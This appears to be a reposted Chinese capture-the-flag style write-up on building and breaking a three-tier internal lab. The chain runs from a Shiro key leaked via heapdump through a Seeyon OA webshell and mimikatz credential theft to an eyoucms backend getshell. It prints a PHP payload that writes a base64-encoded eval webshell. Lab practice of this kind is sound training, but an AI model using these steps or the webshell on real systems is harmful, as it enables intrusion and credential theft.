靶场实操|通关自建三层内网靶场

admin 2023年5月14日21:21:41评论31 views字数 931阅读3分6秒阅读模式

自建内网靶场

靶场实操|通关自建三层内网靶场

https://github.com/yangzongzhuan/RuoYi/releases

靶场实操|通关自建三层内网靶场

ruoyi-admintargetclassesapplication-druid.yml

修改数据库账号密码

靶场实操|通关自建三层内网靶场

idea编译生成适配环境的jar包

数据库配置推荐:mysql5+、jdk1.8

新建数据库ry,导入sql目录的两个sql文件

靶场实操|通关自建三层内网靶场

靶场实操|通关自建三层内网靶场

成功运行

靶场实操|通关自建三层内网靶场

检索cipherKey替换key

靶场实操|通关自建三层内网靶场

除此以外,为了搭建存在的漏洞环境,还需要在pom.xml修改shiro的版本为有漏洞的版本

生成heapdump

1
C:Program FilesJavajdk1.8.0_301bin>jmap -dump:file=C:UsersPublicheapdump <pid>

靶场实操|通关自建三层内网靶场

这样heapdump中便带有了shiro的key

靶场实操|通关自建三层内网靶场

入口机器

80端口为若依系统,8081端口为tomcat管理界面

若依使用的是4.6的版本,存在前台shiro漏洞利用,但是key被修改了

靶场实操|通关自建三层内网靶场

对8081端口tomcat页面进行目录扫描,发现存在heapdump

靶场实操|通关自建三层内网靶场

使用工具进行利用,发现泄露的shiro key

靶场实操|通关自建三层内网靶场

利用的时候记得勾选AES GCM不然会利用不成功

靶场实操|通关自建三层内网靶场

内存马连接后上线cs

靶场实操|通关自建三层内网靶场

对内网资产进行扫描

靶场实操|通关自建三层内网靶场

第二台机器

访问192.168.1.3:81发现是致远oa

靶场实操|通关自建三层内网靶场

使用历史漏洞ajax.do成功写入webshell

靶场实操|通关自建三层内网靶场

使用天蝎进行连接

靶场实操|通关自建三层内网靶场

使用cs建立smb隧道,生成正向beacon到致远机器上运行

靶场实操|通关自建三层内网靶场

或者通过tcp回连

靶场实操|通关自建三层内网靶场

mimikatz抓取密码,发现存在zzz账户

靶场实操|通关自建三层内网靶场

登录zzz账户,在桌面上发现第二个flag

靶场实操|通关自建三层内网靶场

第三台机器

并且通过浏览器记录发现其曾访问过http://192.168.2.3/,并保存了密码,指纹识别为eyoucms

eyoucms1.5.5存在后台getshell漏洞,尝试进行利用

靶场实操|通关自建三层内网靶场

靶场实操|通关自建三层内网靶场

靶场实操|通关自建三层内网靶场

写入webshell,连接成功后拿到第三个flag

1
<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));

靶场实操|通关自建三层内网靶场

靶场实操|通关自建三层内网靶场


推荐关注:

大哥blog:https://pizz33.github.io/

靶场实操|通关自建三层内网靶场


原文始发于微信公众号(WIN哥学安全):靶场实操|通关自建三层内网靶场

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月14日21:21:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场实操|通关自建三层内网靶场http://cn-sec.com/archives/1731318.html

发表评论

匿名网友 填写信息